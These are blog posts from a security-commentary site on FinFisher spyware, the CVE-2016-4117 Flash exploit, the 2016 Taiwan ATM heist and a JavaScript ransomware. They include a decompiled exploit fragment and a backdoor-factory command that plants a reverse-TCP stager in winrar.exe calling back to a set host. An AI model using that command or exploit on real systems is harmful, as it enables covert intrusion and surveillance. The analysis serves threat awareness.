Remark: An Official announcement in 2015 near year end, Da Vinci products not going to export to other countries due to data leakage incident happened on their campus.

ii. FinFisher (Neodymium & Promethium)

Specific users targeted in Europe and Turkey (last update on Dec 2016)

Neodymium uses the W32/Wingbird.A!dha backdoor to spy on users.

Promethium is a a “backdoor” program, it is a malware. He will masquerades as popular Windows tools such as WinUtils, TrueCrypt, WinRAR and SanDisk.

Remark: CVE-2016-4117 confusion code bug in Adobe Flash equivalent a instigator with Neodymium and Promethium. The Adobe Flash bug allow corrupt one of the objects to extend its length to 0xffffffff (see below source code) and its data buffer to address 0. The attacker are allow to access all of the user space memory once ByteArray corrupted. And such a way attacker execute embedded shellcode. If the Flash Player version is older than 21.0.0.196, the attack can’t execute.

public static function flash20(ba:Dtaa3, var4:uint, var5:uint)
{
   var len:uint;
   var flash50:uint;
   try
   {
       flash38 = true;
       flash21 = ba;
       len = ba.length;
       flash50 = (ba.a1 ^ ba.a5);
       ba.a2 = 0xFFFFFFFF;
       ba.a6 = (0XFFFFFFFF ^ flash50);
       ba.endian = Endian.LITTLE_ENDIAN;
       flash39 = var5;
       len = ba.length;
       if (len !=0xFFFFFFFF)
       {
           flash3("");
       };
       if (flash72)
       {
           Play3.flash20(); // Win32.Exec()
        }
       else
       {
           flash1("");
        };
        flash34(var5, var4);
        }

Advanced Persistent Threat – Drawback of remote monitoring

Traditional Lawful Interception solutions face new challenges which highlight by Finfisher (see below)

  • Data not transmitted over any network
  • Encrypted Communications
  • Targets in foreign countries

Finfisher resolution:

FinSpy was installed on several computer systems inside internet Cafes in critical areas in order to monitor them for suspicious activity, especially Skype communications to foreign individuals. Using the Webcam, pictures of the targets were taken while they were using the system

Traditional tactical or strategic Interception solutions face challenges which point out by Finfisher (see below):

  • Data not transmitted over any network and kept on the device
  • Encrypted Communications in the Air-Interface, which
  • avoid the usage of tactical active or passive Off-Air Systems
  • End-to-end encryption from the device such as Messengers,
  • Emails or PIN messages

Finfisher resolution:

FinSpy Mobile was deployed on BlackBerry mobile phones of several Targets to monitor all communications, including SMS/MMS, Email and BlackBerry Messenger.

The official spy tools looks powerful, however there is another sniff technique which available in the IT world.

Implant backdoor example:

Not going to teach how to hack the system but it is a better understanding …………..

This session not going to get in touch with FinFisher backdoor. However few available solution in the market guide you implant a backdoor to Winrar.exe. One of the example display as below:

sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s iat_reverse_tcp_stager_threaded -H 192.168.50.15 -P 8080

Government enforcement agency looks not difficult to expand the APT area of coverage. A lot of time they are relies on phishing.

Concept wise equivalent to government enforcement tool

The objective of the APT intend to collect sensitive data or voice messages during surveillance program process. And therefore the compatibility of the malware become an important factor. We are not a government agency but we can run a test with similar concept of design.

Phishing with Empire – Empire software supports macOS, Linux, and Windows hosts from one listener. The only requirement is that you need find a Command and Control (C2) work with you.

Summary:

The key words advanced persistence threat sound scary however it is only a surveillance program. As a normal citizen I do not believe foreign country have interest on my telephone conversation. From data privacy, it looks that it contained grey area since we do not know the reason why we are under surveillance. Such action let people nervous. However my expectation on these technology is that it must expand to some area in the city which take care the monitor and control of criminal activities. What do you think?

ATM thieves are all in jail. Can you tell me that bank ATM environments are safe now?

Happy Lunar New year 2017

Modern people daily habits looks different when we compared 10 years ago. My wallet has ATM card & Octopus. On my mobile phone there are few options allow pay online. The trend of cyber security addressed how important of end user computer today. Even though back end system protection looks like Royal castle or Pentagon. Who knows their electronic devices has been compromised by hacker. We all busy today, right!

Regarding to cyber attack historical records for financial institute environment , hacker compromised end user machines (customer end point) causes disaster level of outbreak. The statistic summary were told that the possibilities looks lower. Conversely, the most serious of injury was that a inside threat happened in their infrastructure instead of external threat.

Three Eastern European men were arrested in Taiwan in July, 2016 on suspicion of collecting cash stolen from ATMs owned by First Commercial Bank. Refer to the investigation summary of Europol, the specifics cyber attack machanism used spear-phishing emails containing malicious attachments to target bank employees and penetrate the bank’s internal networks.

Below articles is my prediction last year of this incident for reference.

Published on 31st Aug 2016

Possibility – scenario replay (implant Rootkit on BIOS causes ATM machine crazy)

Summary:

Since ATM thieves are all in jail. Can you tell me that bank ATM environments are safe now? Who knows?

More reference:

http://www.reuters.com/article/us-taiwan-cyber-atms-idUSKBN14P0CX

Happy Lunar New Year 2017

 

 

 

Infamous ransomware – another new generation was driven by JavaScript!

 

 

Have you heard the name evil? Seems this naming convention is apply to ransomware now. A simple hierarchic design of ransomware which work with Java script was born in 2017. The evil ransomware was written in 100% JavaScript. There is no visible panel used for decryption.

The designer of Evil (ransomware) looks familiar with forensic investigation. His design first approach to execute the task is going to delete all the executable file from the following folder.

  1. It delete all executable files from the (folder% TEMP% and% APPDATA% \ Microsoft \ Windows \ Start Menu \ Programs \ Startup) once (evil) javascript (file0locked.js) execute by wscript.exe.
  2. Execute command dir / b / s / x generate the file inventory list then save in encrypted format with naming convention 443.exe. Evil make use of ready make solution. Yes, it is a JavaScrypt (Browser-Based Cryptography Tools). JavaScrypt’s encryption facilities use the Advanced Encryption Standard (AES) adopted by the United States as Federal Information Processing Standard 197. JavaScrypt uses 256 bit keys exclusively.
  3. Key generation and encryption (Remark: below details is intended to provide concept for education only.

Encrypted extension:

*.doc *.xls *.pub *.odt *.ods *.odp *.odm *.odc *.odb*.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd *.rtf *.wb2 *.mdf *.dbf *.psd *.pdd *.eps *.ai *.indd *.cdr img_*.jpg *.dng *.3fr *.arw *.srf *.sr2 *.bay *.crw *.cr2 *.dcr *.kdc *.erf *.mef *.mrw *.nef *.nrw *.orf *.raf *.raw *.rwl *.rw2 *.r3d *.ptx *.pef *.srw *.x3f *.der *.cer *.crt *.pem *.pfx *.p12 *.p7b *.p7c

Hash sample: 1817853fdaf2d35988ca22a6db2c939e0f56664576593d325cfd67d24e8fb75c

Current status: 24th Jan 2017

No worries, most popular of antivirus programs are able to detect Devil ransomeware.

For example: Kaspersky,F-Secure,Symantec,TrendMicro. How about Mcafee. It looks that their signature do not have coverage.

antihackingonline.com